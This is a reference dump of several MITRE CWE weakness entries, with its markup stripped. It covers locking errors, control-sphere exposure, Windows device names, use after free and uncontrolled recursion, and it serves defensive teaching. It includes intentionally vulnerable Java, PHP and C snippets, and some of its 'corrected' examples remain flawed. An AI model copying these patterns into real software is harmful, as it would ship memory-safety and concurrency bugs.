Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - - - - The software does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors. - - Locking is a type of synchronization behavior that ensures that multiple independently-operating processes or threads do not interfere with each other when accessing the same resource. All processes/threads are expected to follow the same steps for locking. If these steps are not followed precisely - or if no locking is done at all - then another process/thread could modify the shared resource in a way that is not visible or predictable to the original process. This can lead to data or memory corruption, denial of service, etc. - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Resource Consumption (CPU) - Inconsistent locking discipline can lead to deadlock. - - - - - Implementation - Libraries or Frameworks - Use industry standard APIs to implement locking mechanism. - - - - - In the following Java snippet, methods are defined to get and set a long field in an instance of a class that is shared across multiple threads. Because operations on double and long are nonatomic in Java, concurrent access may cause unexpected behavior. Thus, all operations on long and double fields should be synchronized. - - private long someLongValue;public long getLongValue() {return someLongValue;} - public void setLongValue(long l) {someLongValue = l;} - - - - This code tries to obtain a lock for a file, then writes to it. - - function writeToLog($message){$logfile = fopen("logFile.log", "a"); - //attempt to get logfile lock - if (flock($logfile, LOCK_EX)) {fwrite($logfile,$message); - // unlock logfile - flock($logfile, LOCK_UN);}else {print "Could not obtain lock on logFile.log, message not recorded\n";}}fclose($logFile); - - PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock(). - - - The following function attempts to acquire a lock in order to perform operations on a shared resource. - - void f(pthread_mutex_t *mutex) { - pthread_mutex_lock(mutex); - - /* access shared resource */ - - - pthread_mutex_unlock(mutex); - } - - However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. - In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. - - int f(pthread_mutex_t *mutex) { - int result; - result = pthread_mutex_lock(mutex);if (0 != result)return result; - - - /* access shared resource */ - - - return pthread_mutex_unlock(mutex); - } - - - - It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization... - - if (helper == null) { - synchronized (this) {if (helper == null) {helper = new Helper();}} - }return helper; - - The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called. - Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute: - - helper = new Helper(); - - If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values. - - - - - CVE-2009-0935 - Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935 - - - CVE-2010-4210 - function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210 - - - CVE-2008-4302 - Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302 - - - CVE-2009-1243 - OS kernel performs an unlock in some incorrect circumstances, leading to panic. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243 - - - CVE-2009-2857 - OS deadlock - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857 - - - CVE-2009-1961 - OS deadlock involving 3 separate functions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961 - - - CVE-2009-2699 - deadlock in library - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699 - - - CVE-2009-4272 - deadlock triggered by packets that force collisions in a routing table - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272 - - - CVE-2002-1850 - read/write deadlock between web server and script - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850 - - - CVE-2004-0174 - web server deadlock involving multiple listening connections - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174 - - - CVE-2009-1388 - multiple simultaneous calls to the same function trigger deadlock. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388 - - - CVE-2006-5158 - chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158 - - - CVE-2006-4342 - deadlock when an operation is performed on a resource while it is being removed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342 - - - CVE-2006-2374 - Deadlock in device driver triggered by using file handle of a related device. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374 - - - CVE-2006-2275 - Deadlock when large number of small messages cannot be processed quickly enough. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275 - - - CVE-2005-3847 - OS kernel has deadlock triggered by a signal during a core dump. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847 - - - CVE-2005-3106 - Race condition leads to deadlock. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106 - - - CVE-2005-2456 - Chain: array index error (CWE-129) leads to deadlock (CWE-833) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456 - - - CVE-2001-0682 - Program can not execute when attacker obtains a mutex. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682 - - - CVE-2002-1914 - Program can not execute when attacker obtains a lock on a critical output file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914 - - - CVE-2002-1915 - Program can not execute when attacker obtains a lock on a critical output file. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915 - - - CVE-2002-0051 - Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051 - - - CVE-2000-0338 - Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338 - - - CVE-2000-1198 - Chain: Lock files with predictable names. Resultant from randomness. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198 - - - CVE-2002-1869 - Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869 - - - - - CON31-C - Do not destroy a mutex while it is locked - CWE More Abstract - - - POS48-C - Do not unlock or destroy another POSIX thread's mutex - CWE More Abstract - - - VNA00-J - Ensure visibility when accessing shared primitive variables - - - VNA02-J - Ensure that compound operations on shared variables are atomic - - - VNA05-J - Ensure atomicity when reading and writing 64-bit values - - - LCK06-J - Do not use an instance lock to protect shared static data - - - SFP19 - Missing Lock - - - ASCSM-CWE-667 - - - - - - - - - - - - Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-23 - updated Description, Maintenance_Notes, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Insufficient Locking - - - - The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. - - Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing these private files. If the file permissions are insecure, then parties other than the user will be able to access those files. - A separate control sphere might effectively require that the user can only access the private files, but not any other files on the system. If the program does not ensure that the user is only requesting private files, then the user might be able to access other files on the system. - In either case, the end result is that a resource has been exposed to the wrong party. - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Integrity - Other - Read Application Data - Modify Application Data - Other - - - - A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-22 - Critical - Clarified description to include permissions. - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2009-12-28 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - - - - The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource. - - - - - A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors. - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Operation - - - - - Confidentiality - Integrity - Read Application Data - Modify Application Data - Unexpected State - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Background_Details, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file. - Not properly handling virtual filenames (e.g. AUX, CON, PRN, COM1, LPT1) can result in different types of vulnerabilities. In some cases an attacker can request a device via injection of a virtual filename in a URL, which may cause an error that leads to a denial of service or an error page that reveals sensitive information. A software system that allows device names to bypass filtering runs the risk of an attacker injecting malicious code in a file with the name of a device. - - - - - - Resultant - - - - - - - - Historically, there was a bug in the Windows operating system that caused a blue screen of death. Even after that issue was fixed DOS device names continue to be a factor. - - - - Architecture and Design - - - Implementation - - - Operation - - - High - - - Availability - Confidentiality - Other - DoS: Crash, Exit, or Restart - Read Application Data - Other - - - - - Implementation - Be familiar with the device names in the operating system where your system is deployed. Check input for these device names. - - - - - CVE-2002-0106 - Server allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0106 - - - CVE-2002-0200 - Server allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0200 - - - CVE-2002-1052 - Product allows remote attackers to use MS-DOS device names in HTTP requests to cause a denial of service or obtain the physical path of the server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1052 - - - CVE-2001-0493 - Server allows remote attackers to cause a denial of service via a URL that contains an MS-DOS device name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0493 - - - CVE-2001-0558 - Server allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0558 - - - CVE-2000-0168 - Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0168 - - - CVE-2001-0492 - Server allows remote attackers to determine the physical path of the server via a URL containing MS-DOS device names. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0492 - - - CVE-2004-0552 - Product does not properly handle files whose names contain reserved MS-DOS device names, which can allow malicious code to bypass detection when it is installed, copied, or executed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0552 - - - CVE-2005-2195 - Server allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2195 - - - - File or Directory - - - - Windows MS-DOS device names - - - FIO32-C - Do not perform operations on devices that are only appropriate for files - CWE More Specific - - - FIO00-J - Do not operate on files in shared directories - - - SFP16 - Path Traversal - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Background_Details, Other_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Windows MS-DOS Device Names - Failure to Handle Windows Device Names - - - - The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated. - This weakness captures cases in which a particular code segment is always incorrect with respect to the algorithm that it is implementing. For example, if a C programmer intends to include multiple statements in a single block but does not include the enclosing braces (CWE-483), then the logic is always incorrect. This issue is in contrast to most weaknesses in which the code usually behaves correctly, except when it is externally manipulated in malicious ways. - - - - - - Architecture and Design - - - Implementation - This issue typically appears in rarely-tested code, since the "always-incorrect" nature will be detected as a bug during normal usage. - - - - - Other - Other - Alter Execution Logic - - - - - CVE-2021-3011 - virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011 - - - - This node could possibly be split into lower-level nodes. "Early Return" is for returning control to the caller too soon (e.g., CWE-584). "Excess Return" is when control is returned too far up the call stack (CWE-600, CWE-395). "Improper control limitation" occurs when the product maintains control at a lower level of execution, when control should be returned "further" up the call stack (CWE-455). "Incorrect syntax" covers code that's "just plain wrong" such as CWE-484 and CWE-483. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Maintenance_Notes, Modes_of_Introduction, Other_Notes, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Time_of_Introduction - - - - - The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator. - If the product's administrator does not have the ability to manage security-related decisions at all times, then protecting the product from outside threats - including the product's developer - can become impossible. For example, a hard-coded account name and password cannot be changed by the administrator, thus exposing that product to attacks that the administrator can not prevent. - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - - - Other - Varies by Context - - - - - CWE Community - 2008-04-11 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships - - - CWE Content Team - MITRE - 2009-01-12 - updated Description, Name - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Design Principle Violation: Lack of Administrator Control over Security - - - - The software uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked. - - - - - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Integrity - Confidentiality - Modify Application Data - Read Application Data - If a released resource is subsequently reused or reallocated, then an attempt to use the original resource might allow access to sensitive data that is associated with a different user or entity. - - - Other - Availability - Other - DoS: Crash, Exit, or Restart - When a resource is released it might not be in an expected state, later attempts to access the resource may lead to resultant errors that may lead to a crash. - - - - - The following code shows a simple example of a use after free error: - - char* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);} - - When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function. - - - The following code shows a simple example of a double free error: - - char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); - - Double free vulnerabilities have two common (and sometimes overlapping) causes: - - - - Error conditions and other exceptional circumstances - - - Confusion over which part of the program is responsible for freeing the memory - - - - Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. - - - In the following C/C++ example the method processMessage is used to process a message received in the input array of char arrays. The input message array contains two char arrays: the first is the length of the message and the second is the body of the message. The length of the message is retrieved and used to allocate enough memory for a local char array, messageBody, to be created for the message body. The messageBody is processed in the method processMessageBody that will return an error if an error occurs while processing. If an error occurs then the return result variable is set to indicate an error and the messageBody char array memory is released using the method free and an error message is sent to the logError method. - - #define FAIL 0#define SUCCESS 1#define ERROR -1#define MAX_MESSAGE_SIZE 32 - int processMessage(char **message){ - int result = SUCCESS; - int length = getMessageLength(message[0]);char *messageBody; - if ((length > 0) && (length < MAX_MESSAGE_SIZE)) { - - messageBody = (char*)malloc(length*sizeof(char));messageBody = &message[1][0]; - int success = processMessageBody(messageBody); - if (success == ERROR) {result = ERROR;free(messageBody);} - }else {printf("Unable to process message; invalid message length");result = FAIL;} - if (result == ERROR) {logError("Error processing message", messageBody);} - return result; - } - - However, the call to the method logError includes the messageBody after the memory for messageBody has been released using the free method. This can cause unexpected results and may lead to system crashes. A variable should never be used after its memory resources have been released. - - ...messageBody = (char*)malloc(length*sizeof(char));messageBody = &message[1][0]; - int success = processMessageBody(messageBody); - if (success == ERROR) {result = ERROR;logError("Error processing message", messageBody);free(messageBody);}... - - - - - - CVE-2009-3547 - chain: race condition might allow resource to be released before operating on it, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 - - - - - SFP15 - Faulty Resource Use - - - FIO46-C - Do not access a closed file - CWE More Abstract - - - MEM30-C - Do not access freed memory - CWE More Abstract - - - ASCSM-CWE-672 - - - - - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Description, Name, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Use of a Resource after Expiration or Release - - - - The product does not prevent the definition of control spheres from external actors. - Typically, a product defines its control sphere within the code itself, or through configuration by the product's administrator. In some cases, an external party can change the definition of the control sphere. This is typically a resultant weakness. - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Other - - - - - Consider a blog publishing tool, which might have three explicit control spheres: the creation of articles, only accessible to a "publisher;" commenting on articles, only accessible to a "commenter" who is a registered user; and reading articles, only accessible to an anonymous reader. Suppose that the application is deployed on a web server that is shared with untrusted parties. If a local user can modify the data files that define who a publisher is, then this user has modified the control sphere. In this case, the issue would be resultant from another weakness such as insufficient permissions. - - - In Untrusted Search Path (CWE-426), a user might be able to define the PATH environment variable to cause the product to search in the wrong directory for a library to load. The product's intended sphere of control would include "resources that are only modifiable by the person who installed the product." The PATH effectively changes the definition of this sphere so that it overlaps the attacker's sphere of control. - - - - A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors. - - - - CWE Content Team - MITRE - 2008-04-11 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product does not properly control the amount of recursion which takes place, consuming excessive resources, such as allocated memory or the program stack. - - - - - - - - - Stack Exhaustion - - - - - Implementation - The uncontrolled recursion is often due to an improper or missing conditional - - - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - Resources including CPU, memory, and stack memory could be rapidly consumed or exhausted, eventually leading to an exit or crash. - - - Confidentiality - Read Application Data - In some cases, an application's interpreter might kill a process or thread that appears to be consuming too much resources, such as with PHP's memory_limit setting. When the interpreter kills the process/thread, it might report an error containing detailed information such as the application's installation path. - - - - - Implementation - Ensure an end condition will be reached under all logic conditions. The end condition may include testing against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action. - Moderate - - - Implementation - Increase the stack size. - Limited - Increasing the stack size might only be a temporary measure, since the stack typically is still not very large, and it might remain easy for attackers to cause an out-of-stack fault. - - - - - In this example a mistake exists in the code where the exit condition contained in flg is never called. This results in the function calling itself over and over again until the stack is exhausted. - - -void do_something_recursive (int flg) -{ -... // Do some real work here, but the value of flg is unmodified -if (flg) { do_something_recursive (flg); } // flg is never modified so it is always TRUE - this call will continue until the stack explodes -} -int flag = 1; // Set to TRUE -do_something_recursive (flag); - - Note that the only difference between the Good and Bad examples is that the recursion flag will change value and cause the recursive to return. - -void do_something_recursive (int flg) -{ -... // Do some real work here -// Modify value of flg on done condition -if (flg) { do_something_recursive (flg); } // returns when flg changes to 0 -} -int flag = 1; // Set to TRUE -do_something_recursive (flag); - - - - - - CVE-2007-1285 - Deeply nested arrays trigger stack exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1285 - - - CVE-2007-3409 - Self-referencing pointers create infinite loop and resultant stack exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3409 - - - CVE-2016-10707 - Javascript application accidentally changes input in a way that prevents a recursive call from detecting an exit condition. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10707 - - - CVE-2016-3627 - An attempt to recover a corrupted XML file infinite recursion protection counter was not always incremented missing the exit condition. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3627 - - - 